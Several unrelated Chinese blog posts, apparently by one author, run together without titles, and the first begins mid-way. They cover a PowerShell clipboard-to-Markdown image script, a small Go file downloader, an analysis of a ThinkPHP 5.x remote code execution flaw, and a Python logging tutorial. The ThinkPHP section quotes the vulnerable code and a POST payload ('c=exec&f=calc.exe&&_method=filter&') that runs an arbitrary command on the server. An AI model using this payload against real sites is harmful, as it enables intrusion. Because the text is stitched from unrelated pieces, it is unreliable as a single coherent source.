研究到这一步，实际上最关键的问题在于win下怎么去导出剪切板中的图片。百度谷歌了很多文章，发现都是牛头不照马尾，在此过程中我把PicGo作者的博客翻烂了，发现PicGo作者获取剪切板的图片采用的是命令行调用 https://github.com/PicGo/PicGo-Core/blob/dev/src/utils/clipboard/windows10.ps1 这个脚本。在第一行定义了最关键的项目https://github.com/octan3/img-clipboard-dump。这个就是我们想要的东西！

那么我们的问题就解决了！

看下dump-clipboard-png.ps1

Add-Type -Assembly PresentationCore
$img = [Windows.Clipboard]::GetImage()
if ($img -eq $null) {
    Write-Host "Clipboard contains no image."
    Exit
}

$fcb = new-object Windows.Media.Imaging.FormatConvertedBitmap($img, [Windows.Media.PixelFormats]::Rgb24, $null, 0)
$file = "{0}\clipboard-{1}.png" -f [Environment]::GetFolderPath('MyPictures'),((Get-Date -f s) -replace '[-T:]','')
Write-Host ("`n Found picture. {0}x{1} pixel. Saving to {2}`n" -f $img.PixelWidth, $img.PixelHeight, $file)

$stream = [IO.File]::Open($file, "OpenOrCreate")
$encoder = New-Object Windows.Media.Imaging.PngBitmapEncoder
$encoder.Frames.Add([Windows.Media.Imaging.BitmapFrame]::Create($fcb))
$encoder.Save($stream)
$stream.Dispose()

& explorer.exe /select,$file

首先获取剪切板的图片，如果没图片就exit，然后新建一个位图对象，新建一个file变量当作文件名，从环境变量中拿到MyPictures的路径，然后写入图片。

相对我们想实现的效果还差一步就是直接向剪切板写入markdown格式的图片链接。我在这放出来我修改之后的脚本。(注意修改路径)

Add-Type -Assembly PresentationCore
$img = [Windows.Clipboard]::GetImage()
if ($img -eq $null) {
    Write-Host "Clipboard contains no image."
    Exit
}

$fcb = new-object Windows.Media.Imaging.FormatConvertedBitmap($img, [Windows.Media.PixelFormats]::Rgb24, $null, 0)
$filename = ((Get-Date -f s) -replace '[-T:]','')
$file = "E:/work/myblog/static/img/uploads/{0}.png" -f $filename
Write-Host ("`n Found picture. {0}x{1} pixel. Saving to {2}`n" -f $img.PixelWidth, $img.PixelHeight, $file)

$stream = [IO.File]::Open($file, "OpenOrCreate")
$encoder = New-Object Windows.Media.Imaging.PngBitmapEncoder
$encoder.Frames.Add([Windows.Media.Imaging.BitmapFrame]::Create($fcb))
$encoder.Save($stream)
$stream.Dispose()

$str =  "![{0}](/img/uploads/{1}.png)" -f $filename,$filename
[Windows.Clipboard]::SetText($str)

然后把dump-clipboard-png.cmd改名为png.cmd和png.ps1放到环境变量里，截图，cmd运行png，那么你的剪切板就会写入一个markdown格式的图片咯。并且图片保存在了你的本地。

进一步操作

到现在我们基本的效果已经实现了，不过还是差一点，怎么去实现按下快捷键就导出图片到我们指定的位置呢？参考国光师傅的代码已经写的很清楚了。

https://github.com/sqlsec/imageMD/blob/master/imageMD.py

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

代码

package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
)

var url, path string

func main() {
	if len(os.Args) != 3 {
		fmt.Println("usage:wget.exe http://Y4er.com/cmd.exe cmd.exe")
		os.Exit(0)
	}
	url, path = os.Args[1], os.Args[2]
	fmt.Println("你要下载的文件是：" + url)
	fmt.Println("将要保存到：" + path)
	Download(url, path)
}
func Download(url string, path string) {
	out, err := os.Create(path)
	check(err)
	defer out.Close()

	res, err := http.Get(url)
	check(err)
	defer res.Body.Close()

	_, err = io.Copy(out, res.Body)
	check(err)
	fmt.Println("保存成功，自行检查" + path)
}
func check(err error) {
	if err != nil {
		panic(err)
	}
}

编译好的win64位下载链接：http://Y4er.com/file/go-wget.exe

最近爆出了Thinkphp5.0.*全版本代码执行，其中5.1与5.2全版本在生产环境下下同样也存在代码执行

漏洞分析：

文件位置：\thinkphp\library\think\Request.php

    /**
     * 当前的请求类型
     * @access public
     * @param  bool $origin  是否获取原始请求类型
     * @return string
     */
    public function method($origin = false)
    {
        if ($origin) {
            // 获取原始请求类型
            return $this->server('REQUEST_METHOD') ?: 'GET';
        } elseif (!$this->method) {
            if (isset($_POST[$this->config['var_method']])) {
                $this->method    = strtoupper($_POST[$this->config['var_method']]);
                $method          = strtolower($this->method);
                $this->{$method} = $_POST;
            } elseif ($this->server('HTTP_X_HTTP_METHOD_OVERRIDE')) {
                $this->method = strtoupper($this->server('HTTP_X_HTTP_METHOD_OVERRIDE'));
            } else {
                $this->method = $this->server('REQUEST_METHOD') ?: 'GET';
            }
        }

        return $this->method;
    }

其中：

$this->method    = strtoupper($_POST[$this->config['var_method']]);
$method          = strtolower($this->method);
$this->{$method} = $_POST;

$method变量是$this->method，其同等于POST的”_method”参数值

然后该处存在一个变量覆盖

我们可以覆盖 $filter 属性值(POC如下)

c=exec&f=calc.exe&&_method=filter&

访问如下图所示：

会爆出一个警告级别的异常，导致程序终止

如何触发：

如果设置忽略异常提示，如下图：

本身项目发布就需要屏蔽异常和错误所以这个配置是一个正常的配置

Payload（POST请求）:

弹出计算器

为什么需要logging

在开发过程中，如果程序出现了问题，我们可以使用编辑器的Debug模式来检查bug，但是在发布之后，我们的程序相当于在一个黑盒状态去运行，我们只能看到运行效果，可是程序难免出错，这种情况的话我们就需要日志模块来记录程序当前状态、时间状态、错误状态、标准输出等，这样不论是正常运行还是出现报错，都有记录，我们可以针对性的快速排查问题。

因此，日志记录对于程序的运行状态以及debug都起到了很高效的作用。如果一个程序没有标准的日志记录，就不能算作一个合格的开发者。

logging和print的对比

• logging对输出进行了分级，print没有

• logging具有更灵活的格式化功能，比如运行时间、模块信息

• print输出都在控制台上，logging可以输出到任何位置，比如文件甚至是远程服务器

logging的结构拆分

简单的实例

import logging
​
logger = logging.getLogger("Your Logger")
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
formatter = logging.Formatter(fmt='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y/%m/%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
​
logger.info("this is info msg")
logger.debug("this is debug msg")
logger.warning("this is warn msg")
logger.error("this is error msg")

输出

2019/01/13 13:21:17 - Your Logger - INFO - this is info msg
2019/01/13 13:21:17 - Your Logger - DEBUG - this is debug msg
2019/01/13 13:21:17 - Your Logger - WARNING - this is warn msg
2019/01/13 13:21:17 - Your Logger - ERROR - this is error msg

我们来理解下这个实例。

首先创建了一个logger对象作为生成日志记录的对象，然后设置输出级别为DEBUG，然后创建了一个StreamHandler对象handler，来处理日志，随后创建了一个formatter对象来格式化输出日志记录，然后把formatter赋给handler，最后把handler处理器添加到我们的logger对象中，完成了整个处理流程。

知道整个流程之后我们来看一些细的东西。

Level

logging模块中自带了几个日志级别

在我们的实例中我们设置了输出级别为DEBUG

logger.setLevel(logging.DEBUG)

那么在DEBUG级别之下的也就是NOTSET级别的不会被输出。

如果我们把级别设置为INFO，那么我们实例的输出应该是

2019/01/13 13:21:17 - Your Logger - INFO - this is info msg
2019/01/13 13:21:17 - Your Logger - WARNING - this is warn msg
2019/01/13 13:21:17 - Your Logger - ERROR - this is error msg

只会输出比INFO级别高的日志。

Handler

logging提供的Handler有很多，我简单列举几种

Formatter

fmt参数和datefmt两个参数分别对应日志记录的格式化和时间的格式化。

fmt可用的占位符简单列举几种，更多请参考这里

捕获Traceback

try:
    result = 10 / 0
except Exception:
    logger.error('Faild to get result', exc_info=True)
    # 或者用下面这个
    # logging.exception('Error')
logger.info('Finished')

输出

2019/01/13 14:11:18 - Your Logger - ERROR - Faild to get result
Traceback (most recent call last):
  File "E:/Python/test.py", line 22, in <module>
    result = 10 / 0
ZeroDivisionError: division by zero
2019/01/13 14:11:18 - Your Logger - INFO - Finished

这样会更合理的捕获异常信息。

自定义日志级别

import logging
​
INFO, WARN, ERROR, SUCCESS = range(1, 5)
# print(SYSINFO, WARN, ERROR, SUCCESS)
logging.addLevelName(INFO, '*')
logging.addLevelName(WARN, '!')
logging.addLevelName(ERROR, 'x')
logging.addLevelName(SUCCESS, '+')
​
logger = logging.getLogger('LOGGER')
handler = logging.StreamHandler()
formatter = logging.Formatter(fmt='%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y/%m/%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(INFO)
​
logger.log(INFO, "INFO")
logger.log(WARN, "WARN")
logger.log(ERROR, "ERROR")
logger.log(SUCCESS, "SUCCESS")

输出

2019/01/13 14:17:59 [*] INFO
2019/01/13 14:17:59 [!] WARN
2019/01/13 14:17:59 [x] ERROR
2019/01/13 14:17:59 [+] SUCCESS

先定义级别和数值，然后调用addLevelName(级别名,'输出名')。记得数值不能小于等于0，注意输出日志的级别。

给输出加上颜色

用到了一个第三方的脚本ansistrm.py，下载地址https://gist.github.com/Y4er/6300ccff3a6628ea7bda24e514013476 原作者脚本不支持win10，我修复了一下。

将这个脚本ansistrm.py和你的log.py放到同一目录，然后log.py如下内容

#!/usr/bin/env python3 
# -*- coding: utf-8 -*- 
# @Time : 2019/1/12 21:01 
# @Author : Y4er 
# @Site : http://Y4er.com/
# @File : log.py 
​
​
import logging
​
INFO, WARN, ERROR, SUCCESS = range(1, 5)
# print(SYSINFO, WARN, ERROR, SUCCESS)
logging.addLevelName(INFO, '*')
logging.addLevelName(WARN, '!')
logging.addLevelName(ERROR, 'x')
logging.addLevelName(SUCCESS, '+')
​
logger = logging.getLogger('YOUR LOGGER')
try:
    from ansistrm import ColorizingStreamHandler
​
    handle = ColorizingStreamHandler()
    handle.level_map[logging.getLevelName('*')] = (None, 'cyan', False)
    handle.level_map[logging.getLevelName('+')] = (None, 'green', False)
    handle.level_map[logging.getLevelName('x')] = (None, 'red', False)
    handle.level_map[logging.getLevelName('!')] = (None, 'yellow', False)
except Exception as e:
    print(e)
    handle = logging.StreamHandler()
​
formatter = logging.Formatter('%(asctime)s - [%(levelname)s]  %(message)s', '%Y/%m/%d %H:%M:%S')
handle.setFormatter(formatter)
logger.addHandler(handle)
logger.setLevel(INFO)
​
​
class LOGGER:
    @staticmethod
    def info(msg):
        return logger.log(INFO, msg)
​
    @staticmethod
    def warning(msg):
        return logger.log(WARN, msg)
​
    @staticmethod
    def error(msg):
        return logger.log(ERROR, msg)
​
    @staticmethod
    def success(msg):
        return logger.log(SUCCESS, msg)
​
​
LOGGER.info("INFO msg")
LOGGER.warning("warning msg")
LOGGER.error("error msg")
LOGGER.success("success msg")

在这个脚本中，我写了一个类以及其下的四个静态方法，那么可以这么调用

LOGGER.info("INFO msg")
LOGGER.warning("warning msg")
LOGGER.error("error msg")
LOGGER.success("success msg")

运行效果：

写在文后

是时候抛弃print了！

参考链接

Python中logging模块的基本用法 – 崔庆才老师

原版ansistrm.py – vsajip

修复ansistrm.py以支持win10